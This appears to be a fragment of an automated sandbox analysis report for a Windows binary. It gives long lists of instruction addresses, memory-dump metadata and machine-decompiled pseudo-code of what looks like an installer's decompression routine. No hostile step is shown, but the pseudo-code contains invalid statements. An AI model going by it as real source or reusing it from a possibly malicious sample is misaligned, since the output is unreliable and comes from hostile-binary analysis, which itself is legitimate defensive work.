                                            0x004068f2
                                            0x004068f5
                                            0x004068f8
                                            0x004068fd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406f94
                                            0x00406f94
                                            0x00406f9a
                                            0x00406fa0
                                            0x00406fa6
                                            0x00406fc0
                                            0x00406fc3
                                            0x00406fc9
                                            0x00406fd4
                                            0x00406fd4
                                            0x00406fd6
                                            0x00406fa8
                                            0x00406fa8
                                            0x00406fb7
                                            0x00406fbb
                                            0x00406fbb
                                            0x00406fe0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406fe2
                                            0x00406fe6
                                            0x00407195
                                            0x00407195
                                            0x00000000
                                            0x00407195
                                            0x00406fec
                                            0x00406ff2
                                            0x00406ff9
                                            0x00407001
                                            0x00407004
                                            0x00407007
                                            0x00407007
                                            0x0040700d
                                            0x0040700d
                                            0x00000000
                                            0x00000000
                                            0x00406925
                                            0x00406925
                                            0x00406927
                                            0x0040692a
                                            0x0040699b
                                            0x0040699b
                                            0x0040699e
                                            0x004069a1
                                            0x004069a8
                                            0x004069b2
                                            0x00000000
                                            0x004069b2
                                            0x0040692c
                                            0x0040692c
                                            0x00406930
                                            0x00406933
                                            0x00406935
                                            0x00406938
                                            0x0040693b
                                            0x0040693d
                                            0x00406940
                                            0x00406942
                                            0x00406947
                                            0x0040694a
                                            0x0040694d
                                            0x00406951
                                            0x00406958
                                            0x0040695b
                                            0x00406962
                                            0x00406966
                                            0x0040696e
                                            0x0040696e
                                            0x0040696e
                                            0x00406968
                                            0x00406968
                                            0x00406968
                                            0x0040695d
                                            0x0040695d
                                            0x0040695d
                                            0x00406972
                                            0x00406975
                                            0x00406993
                                            0x00406993
                                            0x00406995
                                            0x00000000
                                            0x00406977
                                            0x00406977
                                            0x00406977
                                            0x0040697a
                                            0x0040697d
                                            0x00406980
                                            0x00406982
                                            0x00406982
                                            0x00406982
                                            0x00406985
                                            0x00406988
                                            0x0040698a
                                            0x0040698b
                                            0x0040698e
                                            0x00000000
                                            0x0040698e
                                            0x00000000
                                            0x00406bc4
                                            0x00406bc4
                                            0x00406bc8
                                            0x00406be6
                                            0x00406be6
                                            0x00406be9
                                            0x00406bf0
                                            0x00406bf3
                                            0x00406bf6
                                            0x00406bf9
                                            0x00406bfc
                                            0x00406bff
                                            0x00406c01
                                            0x00406c08
                                            0x00406c09
                                            0x00406c0b
                                            0x00406c0e
                                            0x00406c11
                                            0x00406c14
                                            0x00406c14
                                            0x00406c19
                                            0x00000000
                                            0x00406c19
                                            0x00406bca
                                            0x00406bca
                                            0x00406bcd
                                            0x00406bd0
                                            0x00406bda
                                            0x00000000
                                            0x00000000
                                            0x00406c2e
                                            0x00406c2e
                                            0x00406c32
                                            0x00406c55
                                            0x00406c58
                                            0x00406c5b
                                            0x00406c65
                                            0x00406c34
                                            0x00406c34
                                            0x00406c37
                                            0x00406c3a
                                            0x00406c3d
                                            0x00406c4a
                                            0x00406c4d
                                            0x00406c4d
                                            0x00000000
                                            0x00000000
                                            0x00406c71
                                            0x00406c71
                                            0x00406c75
                                            0x00000000
                                            0x00000000
                                            0x00406c7b
                                            0x00406c7b
                                            0x00406c7f
                                            0x00000000
                                            0x00000000
                                            0x00406c85
                                            0x00406c85
                                            0x00406c87
                                            0x00406c8b
                                            0x00406c8b
                                            0x00406c8e
                                            0x00406c92
                                            0x00000000
                                            0x00000000
                                            0x00406ce2
                                            0x00406ce2
                                            0x00406ce6
                                            0x00406ced
                                            0x00406ced
                                            0x00406cf0
                                            0x00406cf3
                                            0x00406cfd
                                            0x00000000
                                            0x00406cfd
                                            0x00406ce8
                                            0x00406ce8
                                            0x00000000
                                            0x00000000
                                            0x00406d09
                                            0x00406d09
                                            0x00406d0d
                                            0x00406d14
                                            0x00406d17
                                            0x00406d1a
                                            0x00406d0f
                                            0x00406d0f
                                            0x00406d0f
                                            0x00406d1d
                                            0x00406d20
                                            0x00406d23
                                            0x00406d23
                                            0x00406d26
                                            0x00406d29
                                            0x00406d2c
                                            0x00406d2c
                                            0x00406d2f
                                            0x00406d36
                                            0x00406d3b
                                            0x00000000
                                            0x00000000
                                            0x00406dc9
                                            0x00406dc9
                                            0x00406dcd
                                            0x0040716b
                                            0x0040716b
                                            0x00000000
                                            0x0040716b
                                            0x00406dd3
                                            0x00406dd3
                                            0x00406dd6
                                            0x00406dd9
                                            0x00406ddd
                                            0x00406de0
                                            0x00406de6
                                            0x00406de8
                                            0x00406de8
                                            0x00406de8
                                            0x00406deb
                                            0x00406dee
                                            0x00000000
                                            0x00000000
                                            0x004069be
                                            0x004069be
                                            0x004069c2
                                            0x0040712f
                                            0x0040712f
                                            0x00000000
                                            0x0040712f
                                            0x004069c8
                                            0x004069c8
                                            0x004069cb
                                            0x004069ce
                                            0x004069d2
                                            0x004069d5
                                            0x004069db
                                            0x004069dd
                                            0x004069dd
                                            0x004069dd
                                            0x004069e0
                                            0x004069e3
                                            0x004069e3
                                            0x004069e6
                                            0x004069e9
                                            0x00000000
                                            0x00000000
                                            0x004069ef
                                            0x004069ef
                                            0x004069f5
                                            0x00000000
                                            0x00000000
                                            0x004069fb
                                            0x004069fb
                                            0x004069ff
                                            0x00406a02
                                            0x00406a05
                                            0x00406a08
                                            0x00406a0b
                                            0x00406a0c
                                            0x00406a0f
                                            0x00406a11
                                            0x00406a17
                                            0x00406a1a
                                            0x00406a1d
                                            0x00406a20
                                            0x00406a23
                                            0x00406a26
                                            0x00406a29
                                            0x00406a45
                                            0x00406a48
                                            0x00406a4b
                                            0x00406a4e
                                            0x00406a55
                                            0x00406a59
                                            0x00406a5b
                                            0x00406a5f
                                            0x00406a2b
                                            0x00406a2b
                                            0x00406a2f
                                            0x00406a37
                                            0x00406a3c
                                            0x00406a3e
                                            0x00406a40
                                            0x00406a40
                                            0x00406a62
                                            0x00406a69
                                            0x00406a6c
                                            0x00000000
                                            0x00406a72
                                            0x00406a72
                                            0x00000000
                                            0x00406a72
                                            0x00000000
                                            0x00406a77
                                            0x00406a77
                                            0x00406a7b
                                            0x0040713b
                                            0x0040713b
                                            0x00000000
                                            0x0040713b
                                            0x00406a81
                                            0x00406a81
                                            0x00406a84
                                            0x00406a87
                                            0x00406a8b
                                            0x00406a8e
                                            0x00406a94
                                            0x00406a96
                                            0x00406a96
                                            0x00406a96
                                            0x00406a99
                                            0x00406a9c
                                            0x00406a9c
                                            0x00406a9c
                                            0x00406aa2
                                            0x00000000
                                            0x00000000
                                            0x00406aa4
                                            0x00406aa4
                                            0x00406aa7
                                            0x00406aaa
                                            0x00406aad
                                            0x00406ab0
                                            0x00406ab3
                                            0x00406ab6
                                            0x00406ab9
                                            0x00406abc
                                            0x00406abf
                                            0x00406ac2
                                            0x00406ada
                                            0x00406add
                                            0x00406ae0
                                            0x00406ae3
                                            0x00406ae3
                                            0x00406ae6
                                            0x00406aea
                                            0x00406aec
                                            0x00406ac4
                                            0x00406ac4
                                            0x00406acc
                                            0x00406ad1
                                            0x00406ad3
                                            0x00406ad5
                                            0x00406ad5
                                            0x00406aef
                                            0x00406af6
                                            0x00406af9
                                            0x00000000
                                            0x00406afb
                                            0x00406afb
                                            0x00000000
                                            0x00406afb
                                            0x00406af9
                                            0x00406b00
                                            0x00406b00
                                            0x00406b00
                                            0x00406b00
                                            0x00000000
                                            0x00000000
                                            0x00406b3b
                                            0x00406b3b
                                            0x00406b3f
                                            0x00407147
                                            0x00407147
                                            0x00000000
                                            0x00407147
                                            0x00406b45
                                            0x00406b45
                                            0x00406b48
                                            0x00406b4b
                                            0x00406b4f
                                            0x00406b52
                                            0x00406b58
                                            0x00406b5a
                                            0x00406b5a
                                            0x00406b5a
                                            0x00406b5d
                                            0x00406b60
                                            0x00406b60
                                            0x00406b66
                                            0x00406b04
                                            0x00406b04
                                            0x00406b07
                                            0x00000000
                                            0x00406b07
                                            0x00406b68
                                            0x00406b68
                                            0x00406b6b
                                            0x00406b6e
                                            0x00406b71
                                            0x00406b74
                                            0x00406b77
                                            0x00406b7a
                                            0x00406b7d
                                            0x00406b80
                                            0x00406b83
                                            0x00406b86
                                            0x00406b9e
                                            0x00406ba1
                                            0x00406ba4
                                            0x00406ba7
                                            0x00406ba7
                                            0x00406baa
                                            0x00406bae
                                            0x00406bb0
                                            0x00406b88
                                            0x00406b88
                                            0x00406b90
                                            0x00406b95
                                            0x00406b97
                                            0x00406b99
                                            0x00406b99
                                            0x00406bb3
                                            0x00406bba
                                            0x00406bbd
                                            0x00000000
                                            0x00406bbf
                                            0x00406bbf
                                            0x00000000
                                            0x00406bbf
                                            0x00000000
                                            0x00406e4c
                                            0x00406e4c
                                            0x00406e50
                                            0x00407177
                                            0x00407177
                                            0x00000000
                                            0x00407177
                                            0x00406e56
                                            0x00406e56
                                            0x00406e59
                                            0x00406e5c
                                            0x00406e60
                                            0x00406e63
                                            0x00406e69
                                            0x00406e6b
                                            0x00406e6b
                                            0x00406e6b
                                            0x00406e6e
                                            0x00000000
                                            0x00000000
                                            0x00406c1c
                                            0x00406c1c
                                            0x00406c1f
                                            0x00000000
                                            0x00000000
                                            0x00406f5b
                                            0x00406f5b
                                            0x00406f5f
                                            0x00406f81
                                            0x00406f81
                                            0x00406f84
                                            0x00406f8e
                                            0x00406f91
                                            0x00406f91
                                            0x00000000
                                            0x00406f91
                                            0x00406f61
                                            0x00406f61
                                            0x00406f64
                                            0x00406f68
                                            0x00406f6b
                                            0x00406f6b
                                            0x00406f6e
                                            0x00000000
                                            0x00000000
                                            0x00407018
                                            0x00407018
                                            0x0040701c
                                            0x0040703a
                                            0x0040703a
                                            0x0040703a
                                            0x0040703a
                                            0x00407041
                                            0x00407048
                                            0x0040704f
                                            0x0040704f
                                            0x00407056
                                            0x00407059
                                            0x00407060
                                            0x00000000
                                            0x00407063
                                            0x0040701e
                                            0x0040701e
                                            0x00407021
                                            0x00407024
                                            0x00407027
                                            0x0040702e
                                            0x00406f72
                                            0x00406f72
                                            0x00406f75
                                            0x00000000
                                            0x00000000
                                            0x00407109
                                            0x00407109
                                            0x0040710c
                                            0x0040700d
                                            0x0040700d
                                            0x0040700d
                                            0x00000000
                                            0x00407013
                                            0x00000000
                                            0x00406d43
                                            0x00406d43
                                            0x00406d45
                                            0x00406d4c
                                            0x00406d4d
                                            0x00406d4f
                                            0x00406d52
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00407056
                                            0x00407056
                                            0x00407059
                                            0x00407060
                                            0x00000000
                                            0x00407063
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406d88
                                            0x00406d88
                                            0x00406d8b
                                            0x00406dc1
                                            0x00406dc1
                                            0x00406ef1
                                            0x00406ef1
                                            0x00406ef1
                                            0x00406ef1
                                            0x00406ef4
                                            0x00406ef4
                                            0x00406ef7
                                            0x00406ef9
                                            0x00407183
                                            0x00407183
                                            0x00000000
                                            0x00407183
                                            0x00406eff
                                            0x00406eff
                                            0x00406f02
                                            0x00000000
                                            0x00000000
                                            0x00406f08
                                            0x00406f08
                                            0x00406f0c
                                            0x00406f0f
                                            0x00406f0f
                                            0x00406f0f
                                            0x00000000
                                            0x00406f0f
                                            0x00406d8d
                                            0x00406d8d
                                            0x00406d8f
                                            0x00406d91
                                            0x00406d93
                                            0x00406d96
                                            0x00406d97
                                            0x00406d99
                                            0x00406d9b
                                            0x00406d9e
                                            0x00406da1
                                            0x00406db7
                                            0x00406db7
                                            0x00406dbc
                                            0x00406df4
                                            0x00406df4
                                            0x00406df8
                                            0x00406e21
                                            0x00406e24
                                            0x00406e26
                                            0x00406e2d
                                            0x00406e30
                                            0x00406e33
                                            0x00406e33
                                            0x00406e38
                                            0x00406e38
                                            0x00406e3a
                                            0x00406e3d
                                            0x00406e44
                                            0x00406e47
                                            0x00406e74
                                            0x00406e74
                                            0x00406e77
                                            0x00406e7a
                                            0x00406eee
                                            0x00406eee
                                            0x00406eee
                                            0x00406eee
                                            0x00000000
                                            0x00406eee
                                            0x00406e7c
                                            0x00406e7c
                                            0x00406e82
                                            0x00406e85
                                            0x00406e88
                                            0x00406e8b
                                            0x00406e8e
                                            0x00406e91
                                            0x00406e94
                                            0x00406e97
                                            0x00406e9a
                                            0x00406e9d
                                            0x00406eb6
                                            0x00406eb8
                                            0x00406ebb
                                            0x00406ebc
                                            0x00406ebf
                                            0x00406ec1
                                            0x00406ec4
                                            0x00406ec6
                                            0x00406ec8
                                            0x00406ecb
                                            0x00406ecd
                                            0x00406ed0
                                            0x00406ed4
                                            0x00406ed6
                                            0x00406ed6
                                            0x00406ed7
                                            0x00406eda
                                            0x00406edd
                                            0x00406e9f
                                            0x00406e9f
                                            0x00406ea7
                                            0x00406eac
                                            0x00406eae
                                            0x00406eb1
                                            0x00406eb1
                                            0x00406ee0
                                            0x00406ee7
                                            0x00406e71
                                            0x00406e71
                                            0x00406e71
                                            0x00406e71
                                            0x00000000
                                            0x00406ee9
                                            0x00406ee9
                                            0x00000000
                                            0x00406ee9
                                            0x00406ee7
                                            0x00406dfa
                                            0x00406dfa
                                            0x00406dfd
                                            0x00406dff
                                            0x00406e02
                                            0x00406e05
                                            0x00406e08
                                            0x00406e0a
                                            0x00406e0d
                                            0x00406e10
                                            0x00406e10
                                            0x00406e13
                                            0x00406e13
                                            0x00406e16
                                            0x00406e1d
                                            0x00406df1
                                            0x00406df1
                                            0x00406df1
                                            0x00406df1
                                            0x00000000
                                            0x00406e1f
                                            0x00406e1f
                                            0x00000000
                                            0x00406e1f
                                            0x00406e1d
                                            0x00406da3
                                            0x00406da3
                                            0x00406da6
                                            0x00406da8
                                            0x00406dab
                                            0x00000000
                                            0x00000000
                                            0x00406b0a
                                            0x00406b0a
                                            0x00406b0e
                                            0x00407153
                                            0x00407153
                                            0x00000000
                                            0x00407153
                                            0x00406b14
                                            0x00406b14
                                            0x00406b17
                                            0x00406b1a
                                            0x00406b1d
                                            0x00406b20
                                            0x00406b23
                                            0x00406b26
                                            0x00406b28
                                            0x00406b2b
                                            0x00406b2e
                                            0x00406b31
                                            0x00406b33
                                            0x00406b33
                                            0x00406b33
                                            0x00000000
                                            0x00000000
                                            0x00406c95
                                            0x00406c95
                                            0x00406c99
                                            0x0040715f
                                            0x0040715f
                                            0x00000000
                                            0x0040715f
                                            0x00406c9f
                                            0x00406c9f
                                            0x00406ca2
                                            0x00406ca5
                                            0x00406ca8
                                            0x00406caa
                                            0x00406caa
                                            0x00406caa
                                            0x00406cad
                                            0x00406cb0
                                            0x00406cb3
                                            0x00406cb6
                                            0x00406cb9
                                            0x00406cbc
                                            0x00406cbd
                                            0x00406cbf
                                            0x00406cbf
                                            0x00406cbf
                                            0x00406cc2
                                            0x00406cc5
                                            0x00406cc8
                                            0x00406ccb
                                            0x00406ccb
                                            0x00406ccb
                                            0x00406cce
                                            0x00406cd0
                                            0x00406cd0
                                            0x00000000
                                            0x00000000
                                            0x00406f12
                                            0x00406f12
                                            0x00406f12
                                            0x00406f16
                                            0x00000000
                                            0x00000000
                                            0x00406f1c
                                            0x00406f1c
                                            0x00406f1f
                                            0x00406f22
                                            0x00406f25
                                            0x00406f27
                                            0x00406f27
                                            0x00406f27
                                            0x00406f2a
                                            0x00406f2d
                                            0x00406f30
                                            0x00406f33
                                            0x00406f36
                                            0x00406f39
                                            0x00406f3a
                                            0x00406f3c
                                            0x00406f3c
                                            0x00406f3c
                                            0x00406f3f
                                            0x00406f42
                                            0x00406f45
                                            0x00406f48
                                            0x00406f4b
                                            0x00406f4f
                                            0x00406f51
                                            0x00406f54
                                            0x00000000
                                            0x00406f56
                                            0x00406f56
                                            0x00406cd3
                                            0x00406cd3
                                            0x00000000
                                            0x00406cd3
                                            0x00406f54
                                            0x00407189
                                            0x00407189
                                            0x00000000
                                            0x00000000
                                            0x004067b8
                                            0x004071c0
                                            0x004071c0
                                            0x00000000
                                            0x004071c0
                                            0x0040700d
                                            0x0040708d
                                            0x00407056

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8cc43af0f3dc7360b650843029f4fb37e98cf8e44e9d3f0eb3b9d5ec05d02dde
                                            • Instruction ID: 56db4e79aaf5e8580c905796a14d264bc3fb4972df64c765fca97ee639103a5c
                                            • Opcode Fuzzy Hash: 8cc43af0f3dc7360b650843029f4fb37e98cf8e44e9d3f0eb3b9d5ec05d02dde
                                            • Instruction Fuzzy Hash: 87A15531E04229CBDF28CFA8C8446ADBBB1FF44305F14812ED856BB281C7786A86DF45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00406F5B, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E00406F5B() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
